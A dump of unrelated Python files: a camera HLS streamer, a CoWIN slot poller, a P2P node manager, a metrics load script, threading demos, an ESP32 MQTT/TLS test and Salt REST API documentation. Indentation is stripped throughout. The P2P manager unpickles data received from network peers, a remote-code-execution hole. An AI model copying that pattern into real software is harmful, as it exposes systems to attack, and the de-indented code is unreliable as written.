# Wait to make sure other plugins that may use pi camera to init first, then yield to them if they are already using pi camera
time.sleep(10)
if os.path.exists(CAM_EXCLUSIVE_USE):
_logger.warning('Conceding pi camera exclusive use')
return
if not self.__init_camera__(plugin, dev_settings):
return
self.webcam_server = WebcamServer(self.camera)
self.webcam_server.start()
# Stream timestamps should be reset when ffmepg restarts
requests.delete(self.stream_host+'/video/mpegts', headers={"Authorization": "Bearer " + self.token})
ffmpeg_cmd = '{} -re -i pipe:0 -y -an -vcodec copy -f hls -hls_time 2 -hls_list_size 10 -hls_delete_threshold 10 -hls_flags split_by_time+delete_segments+second_level_segment_index -strftime 1 -hls_segment_filename {}/%s-%%d.ts -hls_segment_type mpegts -'.format(FFMPEG, TS_TEMP_DIR)
_logger.warning('Launching: ' + ffmpeg_cmd)
FNULL = open(os.devnull, 'w')
sub_proc = subprocess.Popen(ffmpeg_cmd.split(' '), stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=FNULL)
m3u8_thread = Thread(target=self.poll_m3u8, args=(sub_proc,))
m3u8_thread.setDaemon(True)
m3u8_thread.start()
while True:
if remote_status['watching']:
self.camera.start_recording(sub_proc.stdin, format='h264', quality=(30 if 'high' in dev_settings.get('camResolution', 'medium') else 23))
while remote_status['watching']:
self.camera.wait_recording(2)
self.camera.wait_recording(4) # record 4 more seconds to minimize the pause user views the stream again
self.camera.stop_recording()
else:
time.sleep(0.05)
def poll_m3u8(self, sub_proc):
last_10 = deque([], 10)
while True:
l = sub_proc.stdout.readline().decode('iso-8859-1').strip()
if l.endswith('.ts') and not l in last_10:
last_10.append(l)
self.upload_mpegts_to_server(os.path.join(TS_TEMP_DIR,l))
def upload_mpegts_to_server(self, mpegts):
try:
files = {'file': ('ts', open(mpegts, 'rb'))}
r = requests.post(self.stream_host+'/video/mpegts', data={'filename': mpegts}, files=files, headers={"Authorization": "Bearer " + self.token})
r.raise_for_status()
except:
self.sentryClient.captureException()
exc_type, exc_obj, exc_tb = sys.exc_info()
_logger.error(exc_obj, exc_info=True)
class StubCamera:
def __init__(self):
from itertools import cycle
h264s_path = '/mjpg-streamer/h264s'
h264s = map(lambda x: os.path.join(h264s_path, x), sorted(os.listdir(h264s_path)))
self.h264_files = cycle(h264s)
self.running = False
self.last_frame = 0
def capture_continuous(self, bio, format='jpeg', use_video_port=True):
return []
def start_recording(self, stream, **kargs):
self.running = True
thr = Thread(target=self.stream_h264_files, args=(stream,))
thr.setDaemon(True)
thr.start()
def stop_recording(self):
self.running = False
def wait_recording(self, seconds):
time.sleep(seconds)
def stream_h264_files(self, stream):
for fn in self.h264_files:
if not self.running:
return
time.sleep(max(2 - (time.time() - self.last_frame), 0))
self.last_frame = time.time()
with open(fn) as f:
stream.write(f.read())
if __name__ == "__main__":
from flask import Flask, request, Response, send_from_directory
app = Flask(__name__)
@app.route('/<path:path>')
def send_js(path):
return send_from_directory(TS_TEMP_DIR, path)
def start_server():
app.run(host='0.0.0.0', port=3333, threaded=False)
@app.route('/livestream.m3u8')
def livestream_m3u8():
response = '\n'.join(list(m3u8_q))
resp = Response(response, mimetype='application/vnd.apple.mpegurl')
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
resp.headers["Access-Control-Max-Age"] = "1000"
resp.headers["Access-Control-Allow-Headers"] = "*"
return resp
t2 = Thread(target=start_server)
t2.daemon = True
t2.start()
H264Streamer().start_hls_pipeline('asdf', {'watching': True})
|
code.py | import sys
import json
import time
import requests
import threading
from .notifier import emailsend, dummySend
def User_check(user):
while True:
time.sleep(3)
api = "https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByPin?pincode="+user.pincd+"&date="+user.date
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
print(api)
response = requests.get(api, headers=headers)
op = json.loads(response.text)
if op['sessions'] == []:
pass
else:
dummySend(user, op)
sys.exit()
def subcription(rcvr):
thr = threading.Thread(target=User_check, args=(rcvr,))
thr.start() |
connection_manager_old.py | import socket
import threading
import pickle
import signal
import codecs
import time
import os
from concurrent.futures import ThreadPoolExecutor
from .message_manager import (
MessageManager,
MSG_ADD,
MSG_REMOVE,
MSG_CORE_LIST,
MSG_REQUEST_CORE_LIST,
MSG_PING,
MSG_ADD_AS_EDGE,
MSG_REMOVE_EDGE,
ERR_PROTOCOL_UNMATCH,
ERR_VERSION_UNMATCH,
OK_WITH_PAYLOAD,
OK_WITHOUT_PAYLOAD,
)
# 動作確認用の値。本来は30分(1800)くらいがいいのでは
PING_INTERVAL = 10
class ConnectionManager:
def __init__(self, host, my_port):
print('Initializing ConnectionManager...')
self.host = host
self.port = my_port
self.core_node_set = set()
self.edge_node_set = set()
self.__add_peer((host, my_port))
self.mm = MessageManager()
# 待受を開始する際に呼び出される(ServerCore向け
def start(self):
t = threading.Thread(target=self.__wait_for_access)
t.start()
self.ping_timer_p = threading.Timer(PING_INTERVAL, self.__check_peers_connection)
self.ping_timer_p.start()
self.ping_timer_e = threading.Timer(PING_INTERVAL, self.__check_edges_connection)
self.ping_timer_e.start()
# ユーザが指定した既知のCoreノードへの接続(ServerCore向け
def join_network(self, host, port):
self.__connect_to_P2PNW(host, port)
# 指定されたノードに対してメッセージを送信する
def send_msg(self, peer, msg):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((peer))
s.sendall(msg.encode('utf-8'))
s.close()
except OSError:
print('Connection failed for peer : ', peer)
self.__remove_peer(peer)
# Coreノードリストに登録されている全てのノードに対して同じメッセージをブロードキャストする
def send_msg_to_all_peer(self, msg):
print('send_msg_to_all_peer was called! ')
for peer in self.core_node_set:
if peer != (self.host, self.port):
print('message will be sent to ... ', peer)
self.send_msg(peer, msg)
# Edgeノードリストに登録されている全てのノードに対して同じメッセージをブロードキャストする
def send_msg_to_all_edge(self, msg):
print('send_msg_to_all_edge was called! ')
for edge in self.edge_node_set:
print("message will be sent to ... " ,edge)
self.send_msg(edge, msg)
# 終了前の処理としてソケットを閉じる
def connection_close(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.host, self.port))
self.socket.close()
s.close()
self.ping_timer_p.cancel()
self.ping_timer_e.cancel()
def __connect_to_P2PNW(self, host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
msg = self.mm.build(MSG_ADD, self.port)
s.sendall(msg.encode('utf-8'))
s.close()
def __wait_for_access(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind((self.host, self.port))
self.socket.listen(0)
executor = ThreadPoolExecutor(max_workers=os.cpu_count())
while True:
print('Waiting for the connection ...')
soc, addr = self.socket.accept()
print('Connected by .. ', addr)
data_sum = ''
params = (soc, addr, data_sum)
executor.submit(self.__handle_message, params)
# 受信したメッセージを確認して、内容に応じた処理を行う。クラスの外からは利用しない想定
def __handle_message(self, params):
soc, addr, data_sum = params
while True:
data = soc.recv(1024)
data_sum = data_sum + data.decode('utf-8')
if not data:
break
if not data_sum:
return
result, reason, cmd, peer_port, payload = self.mm.parse(data_sum)
print(result, reason, cmd, peer_port, payload)
status = (result, reason)
if status == ('error', ERR_PROTOCOL_UNMATCH):
print('Error: Protocol name is not matched')
return
elif status == ('error', ERR_VERSION_UNMATCH):
print('Error: Protocol version is not matched')
return
elif status == ('ok', OK_WITHOUT_PAYLOAD):
if cmd == MSG_ADD:
print('ADD node request was received!!')
self.__add_peer((addr[0], peer_port))
if(addr[0], peer_port) == (self.host, self.port):
return
else:
cl = pickle.dumps(self.core_node_set, 0).decode()
msg = self.mm.build(MSG_CORE_LIST, self.port, cl)
self.send_msg_to_all_peer(msg)
elif cmd == MSG_REMOVE:
self.__remove_peer((addr[0], peer_port))
cl = pickle.dumps(self.core_node_set, 0).decode()
msg = self.mm.build(MSG_CORE_LIST, self.port, cl)
self.send_msg_to_all_peer(msg)
elif cmd == MSG_PING:
# 特にやること思いつかない
return
elif cmd == MSG_REQUEST_CORE_LIST:
print('List for Core nodes was requested!!')
cl = pickle.dumps(self.core_node_set, 0).decode()
msg = self.mm.build(MSG_CORE_LIST, self.port, cl)
self.send_msg((addr[0], peer_port), msg)
elif cmd == MSG_ADD_AS_EDGE:
self.__add_edge_node((addr[0], peer_port, payload))
cl = pickle.dumps(self.core_node_set, 0).decode()
msg = self.mm.build(MSG_CORE_LIST, self.port, cl)
self.send_msg((addr[0], peer_port), msg)
elif cmd == MSG_REMOVE_EDGE:
self.__remove_edge_node((addr[0], peer_port))
else:
print('received unknown command', cmd)
return
elif status == ('ok', OK_WITH_PAYLOAD):
if cmd == MSG_CORE_LIST:
# TODO: 受信したリストをただ上書きしてしまうのは本来セキュリティ的には宜しくない。
# 信頼できるノードの鍵とかをセットしとく必要があるかも
# このあたりの議論については6章にて補足予定
print('Refresh the core node list...')
new_core_set = pickle.loads(payload.encode('utf8'))
print('latest core node list: ', new_core_set)
self.core_node_set = new_core_set
else:
print('received unknown command', cmd)
return
else:
print('Unexpected status', status)
# 新たに接続されたCoreノードをリストに追加する。クラスの外からは利用しない想定
def __add_peer(self, peer):
print('Adding peer: ', peer)
self.core_node_set.add((peer))
print('Current Core set: ', self.core_node_set)
def __add_edge_node(self, edge):
print('Adding edge: ', edge)
self.edge_node_set.add((edge))
print('Current Edge set: ', self.edge_node_set)
# 離脱したCoreノードをリストから削除する。クラスの外からは利用しない想定
def __remove_peer(self, peer):
if peer in self.core_node_set:
print('Removing peer: ', peer)
self.core_node_set.remove(peer)
print('Current Core set: ', self.core_node_set)
def __remove_edge_node(self, edge):
if edge in self.edge_node_set:
print('Removing edge: ', edge)
self.edge_node_set.remove(edge)
print('Current Edge set: ', self.edge_node_set)
def __check_peers_connection(self):
"""
接続されているCoreノード全ての生存確認を行う。クラスの外からは利用しない想定
この確認処理は定期的に実行される
"""
print('check_peers_connection was called')
changed = False
dead_c_node_set = list(filter(lambda p: not self.__is_alive(p), self.core_node_set))
if dead_c_node_set:
changed = True
print('Removing ', dead_c_node_set)
self.core_node_set = self.core_node_set - set(dead_c_node_set)
print('current core node list:', self.core_node_set)
# 変更があった時だけブロードキャストで通知する
if changed:
cl = pickle.dumps(self.core_node_set, 0).decode()
msg = self.mm.build(MSG_CORE_LIST, self.port, cl)
self.send_msg_to_all_peer(msg)
self.ping_timer_p = threading.Timer(PING_INTERVAL, self.__check_peers_connection)
self.ping_timer_p.start()
def __check_edges_connection(self):
"""
接続されているEdgeノード全ての生存確認を行う。クラスの外からは利用しない想定
この確認処理は定期的に実行される
"""
print('check_edges_connection was called')
dead_e_node_set = list(filter(lambda p: not self.__is_alive(p), self.edge_node_set))
if dead_e_node_set:
print('Removing ', dead_e_node_set)
self.edge_node_set = self.edge_node_set - set(dead_e_node_set)
print('current edge node list:', self.edge_node_set)
self.ping_timer_e = threading.Timer(PING_INTERVAL, self.__check_edges_connection)
self.ping_timer_e.start()
def __is_alive(self, target):
"""
有効ノード確認メッセージの送信
param:
target : 有効ノード確認メッセージの送り先となるノードの接続情報(IPアドレスとポート番号)
"""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target))
msg_type = MSG_PING
msg = self.mm.build(msg_type)
s.sendall(msg.encode('utf-8'))
s.close()
return True
except OSError:
return False
|
ingest-multi.py | #!/usr/bin/env python
# Licensed to Rackspace under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# Rackspace licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import uuid
import random
from optparse import OptionParser
from multiprocessing import Process
try:
import simplejson as json
except ImportError:
import json
try:
import requests
except ImportError:
raise ImportError('Missing dependency requests. ' +
'Please install it using pip.')
def _generate_metrics_data(tenantId, metricName):
data = []
# Blueflood understands millis since epoch only
now = long(time.time() * 1000)
# Publish metrics with older timestamps (2 hrs before current time)
startTimestamp = now - 2 * 60 * 60 * 1000
endTimestamp = startTimestamp
for i in range(2000):
metric = {}
metric['collectionTime'] = endTimestamp
metric['tenantId'] = tenantId
metric['metricName'] = metricName + str(i)
metric['metricValue'] = random.randint(1, 100)
metric['ttlInSeconds'] = 2 * 24 * 60 * 60 # 2 days
metric['unit'] = 'seconds'
data.append(metric)
endTimestamp += 30 * 1000 # 30s spaced metric samples
return data, startTimestamp, endTimestamp
def _get_metrics_url(host, port, scheme, tenantId):
return scheme + '://' + host + ':' + port + '/v2.0/'\
+ tenantId + '/ingest/multi'
def main():
usage = 'usage: %prog \n' + \
'--host=<host running blueflood> \n' + \
'--port=<blueflood HTTP metrics ingestion port>'
parser = OptionParser(usage=usage)
parser.add_option('--host', dest='host', help='Blueflood host')
parser.add_option('--port', dest='port', help='HTTP ingestion port')
(options, args) = parser.parse_args()
if not options.host:
options.host = 'localhost'
if not options.port:
options.port = '19000'
tenantId = 'ac' + str(uuid.uuid1())
metricName = 'met.' + str(uuid.uuid1())
(payload, start, end) = _generate_metrics_data(tenantId, metricName)
prettyjsondata = json.dumps(payload, indent=4, separators=(',', ': '))
print(prettyjsondata)
url = _get_metrics_url(options.host, options.port, 'http', tenantId)
print(url)
try:
print('Writing metrics for tenant: %s, metric name: %s,\
start: %d, end: %d' % (tenantId, metricName, start, end))
r = requests.post(url, data=json.dumps(payload))
print('Response from server %s' % (r))
print('To retrive the generated data with retrieve.py script, use the following command (assuming port number 20000):')
print('')
print('./retrieve.py --host %s --port 20000 --metric %s --tenant %s --from %s --to %s --points 100' \
% (options.host, metricName, tenantId, start - 100000000, end + 100000000))
print('')
except Exception, ex:
print(ex)
raise Exception('Cannot ingest metrics into blueflood')
def iterateMultipleTimes():
for i in range(10000):
main()
iterCount = 200
processes = []
for i in range(iterCount):
processes.append(Process(target=iterateMultipleTimes))
for p in processes:
p.start()
for p in processes:
p.join() |
thead_lock.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import threading
import time
num = 0
def run(n):
time.sleep(1)
global num
num +=1
print '%s\n' %num
for i in range(100):
t = threading.Thread(target=run,args=(i,))
t.start()
'''
总结:使用如上线程你会发现问题,并没有输出到100会出现数据丢失的问题
'''第二期 Y20170505 V/华记 V1 10 1.3% M4.5/ |
02_ThreadingEnum.py | import time
import threading
def sing():
for i in range(5):
print("Sing national song ...\n")
# time.sleep(1)
def dance():
for i in range(5):
print("Dance friend step ...\n")
# time.sleep(1)
def main():
t1 = threading.Thread(target=sing)
t2 = threading.Thread(target=dance)
t1.start()
time.sleep(1)
t2.start()
time.sleep(1)
# t1.join()
# t2.join()
print(threading.enumerate())
print("======== main ==============\n")
if __name__ == "__main__":
main()
|
app_test.py | from __future__ import print_function
from __future__ import unicode_literals
import re
import os
import socket
import select
import subprocess
from threading import Thread, Event
import ttfw_idf
import ssl
def _path(f):
return os.path.join(os.path.dirname(os.path.realpath(__file__)),f)
def set_server_cert_cn(ip):
arg_list = [
['openssl', 'req', '-out', _path('srv.csr'), '-key', _path('server.key'),'-subj', "/CN={}".format(ip), '-new'],
['openssl', 'x509', '-req', '-in', _path('srv.csr'), '-CA', _path('ca.crt'),
'-CAkey', _path('ca.key'), '-CAcreateserial', '-out', _path('srv.crt'), '-days', '360']]
for args in arg_list:
if subprocess.check_call(args) != 0:
raise("openssl command {} failed".format(args))
def get_my_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
# Simple server for mqtt over TLS connection
class TlsServer:
def __init__(self, port, client_cert=False, refuse_connection=False, use_alpn=False):
self.port = port
self.socket = socket.socket()
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.settimeout(10.0)
self.shutdown = Event()
self.client_cert = client_cert
self.refuse_connection = refuse_connection
self.ssl_error = None
self.use_alpn = use_alpn
self.negotiated_protocol = None
def __enter__(self):
try:
self.socket.bind(('', self.port))
except socket.error as e:
print("Bind failed:{}".format(e))
raise
self.socket.listen(1)
self.server_thread = Thread(target=self.run_server)
self.server_thread.start()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.shutdown.set()
self.server_thread.join()
self.socket.close()
if (self.conn is not None):
self.conn.close()
def get_last_ssl_error(self):
return self.ssl_error
def get_negotiated_protocol(self):
return self.negotiated_protocol
def run_server(self):
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
if self.client_cert:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=_path("ca.crt"))
context.load_cert_chain(certfile=_path("srv.crt"), keyfile=_path("server.key"))
if self.use_alpn:
context.set_alpn_protocols(["mymqtt", "http/1.1"])
self.socket = context.wrap_socket(self.socket, server_side=True)
try:
self.conn, address = self.socket.accept() # accept new connection
self.socket.settimeout(10.0)
print(" - connection from: {}".format(address))
if self.use_alpn:
self.negotiated_protocol = self.conn.selected_alpn_protocol()
print(" - negotiated_protocol: {}".format(self.negotiated_protocol))
self.handle_conn()
except ssl.SSLError as e:
self.conn = None
self.ssl_error = str(e)
print(" - SSLError: {}".format(str(e)))
def handle_conn(self):
while not self.shutdown.is_set():
r,w,e = select.select([self.conn], [], [], 1)
try:
if self.conn in r:
self.process_mqtt_connect()
except socket.error as err:
print(" - error: {}".format(err))
raise
def process_mqtt_connect(self):
try:
data = bytearray(self.conn.recv(1024))
message = ''.join(format(x, '02x') for x in data)
if message[0:16] == '101800044d515454':
if self.refuse_connection is False:
print(" - received mqtt connect, sending ACK")
self.conn.send(bytearray.fromhex("20020000"))
else:
# injecting connection not authorized error
print(" - received mqtt connect, sending NAK")
self.conn.send(bytearray.fromhex("20020005"))
else:
raise Exception(" - error process_mqtt_connect unexpected connect received: {}".format(message))
finally:
# stop the server after the connect message in happy flow, or if any exception occur
self.shutdown.set()
@ttfw_idf.idf_custom_test(env_tag="Example_WIFI", group="test-apps")
def test_app_protocol_mqtt_publish_connect(env, extra_data):
"""
steps:
1. join AP
2. connect to uri specified in the config
3. send and receive data
"""
dut1 = env.get_dut("mqtt_publish_connect_test", "tools/test_apps/protocols/mqtt/publish_connect_test", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mqtt_publish_connect_test.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("mqtt_publish_connect_test_bin_size", "{}KB".format(bin_size // 1024))
# Look for test case symbolic names
cases = {}
try:
for i in ["CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT",
"CONFIG_EXAMPLE_CONNECT_CASE_SERVER_CERT",
"CONFIG_EXAMPLE_CONNECT_CASE_MUTUAL_AUTH",
"CONFIG_EXAMPLE_CONNECT_CASE_INVALID_SERVER_CERT",
"CONFIG_EXAMPLE_CONNECT_CASE_SERVER_DER_CERT",
"CONFIG_EXAMPLE_CONNECT_CASE_MUTUAL_AUTH_KEY_PWD",
"CONFIG_EXAMPLE_CONNECT_CASE_MUTUAL_AUTH_BAD_CRT",
"CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT_ALPN"]:
cases[i] = dut1.app.get_sdkconfig()[i]
except Exception:
print('ENV_TEST_FAILURE: Some mandatory test case not found in sdkconfig')
raise
dut1.start_app()
esp_ip = dut1.expect(re.compile(r" IPv4 address: ([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"), timeout=30)
print("Got IP={}".format(esp_ip[0]))
#
# start connection test
ip = get_my_ip()
set_server_cert_cn(ip)
server_port = 2222
def start_case(case, desc):
print("Starting {}: {}".format(case, desc))
case_id = cases[case]
dut1.write("conn {} {} {}".format(ip, server_port, case_id))
dut1.expect("Test case:{} started".format(case_id))
return case_id
for case in ["CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT", "CONFIG_EXAMPLE_CONNECT_CASE_SERVER_CERT", "CONFIG_EXAMPLE_CONNECT_CASE_SERVER_DER_CERT"]:
# All these cases connect to the server with no server verification or with server only verification
with TlsServer(server_port):
test_nr = start_case(case, "default server - expect to connect normally")
dut1.expect("MQTT_EVENT_CONNECTED: Test={}".format(test_nr), timeout=30)
with TlsServer(server_port, refuse_connection=True):
test_nr = start_case(case, "ssl shall connect, but mqtt sends connect refusal")
dut1.expect("MQTT_EVENT_ERROR: Test={}".format(test_nr), timeout=30)
dut1.expect("MQTT ERROR: 0x5") # expecting 0x5 ... connection not authorized error
with TlsServer(server_port, client_cert=True) as s:
test_nr = start_case(case, "server with client verification - handshake error since client presents no client certificate")
dut1.expect("MQTT_EVENT_ERROR: Test={}".format(test_nr), timeout=30)
dut1.expect("ESP-TLS ERROR: 0x8010") # expect ... handshake error (PEER_DID_NOT_RETURN_A_CERTIFICATE)
if "PEER_DID_NOT_RETURN_A_CERTIFICATE" not in s.get_last_ssl_error():
raise("Unexpected ssl error from the server {}".format(s.get_last_ssl_error()))
for case in ["CONFIG_EXAMPLE_CONNECT_CASE_MUTUAL_AUTH", "CONFIG_EXAMPLE_CONNECT_CASE_MUTUAL_AUTH_KEY_PWD"]:
# These cases connect to server with both server and client verification (client key might be password protected)
with TlsServer(server_port, client_cert=True):
test_nr = start_case(case, "server with client verification - expect to connect normally")
dut1.expect("MQTT_EVENT_CONNECTED: Test={}".format(test_nr), timeout=30)
case = "CONFIG_EXAMPLE_CONNECT_CASE_INVALID_SERVER_CERT"
with TlsServer(server_port) as s:
test_nr = start_case(case, "invalid server certificate on default server - expect ssl handshake error")
dut1.expect("MQTT_EVENT_ERROR: Test={}".format(test_nr), timeout=30)
dut1.expect("ESP-TLS ERROR: 0x8010") # expect ... handshake error (TLSV1_ALERT_UNKNOWN_CA)
if "alert unknown ca" not in s.get_last_ssl_error():
raise Exception("Unexpected ssl error from the server {}".format(s.get_last_ssl_error()))
case = "CONFIG_EXAMPLE_CONNECT_CASE_MUTUAL_AUTH_BAD_CRT"
with TlsServer(server_port, client_cert=True) as s:
test_nr = start_case(case, "Invalid client certificate on server with client verification - expect ssl handshake error")
dut1.expect("MQTT_EVENT_ERROR: Test={}".format(test_nr), timeout=30)
dut1.expect("ESP-TLS ERROR: 0x8010") # expect ... handshake error (CERTIFICATE_VERIFY_FAILED)
if "CERTIFICATE_VERIFY_FAILED" not in s.get_last_ssl_error():
raise Exception("Unexpected ssl error from the server {}".format(s.get_last_ssl_error()))
for case in ["CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT", "CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT_ALPN"]:
with TlsServer(server_port, use_alpn=True) as s:
test_nr = start_case(case, "server with alpn - expect connect, check resolved protocol")
dut1.expect("MQTT_EVENT_CONNECTED: Test={}".format(test_nr), timeout=30)
if case == "CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT" and s.get_negotiated_protocol() is None:
print(" - client with alpn off, no negotiated protocol: OK")
elif case == "CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT_ALPN" and s.get_negotiated_protocol() == "mymqtt":
print(" - client with alpn on, negotiated protocol resolved: OK")
else:
raise Exception("Unexpected negotiated protocol {}".format(s.get_negotiated_protocol()))
if __name__ == '__main__':
test_app_protocol_mqtt_publish_connect()
|
app.py | # encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/saltstack-netapi-client-java
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request. The order of commands in the request
corresponds to the return for each command in the response.
Lowstate, broadly, is a dictionary of values that are mapped to a function
call. This pattern is used pervasively throughout Salt. The functions called
from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`.
The following example (in JSON format) causes Salt to execute two commands, a
command sent to minions as well as a runner function on the master::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
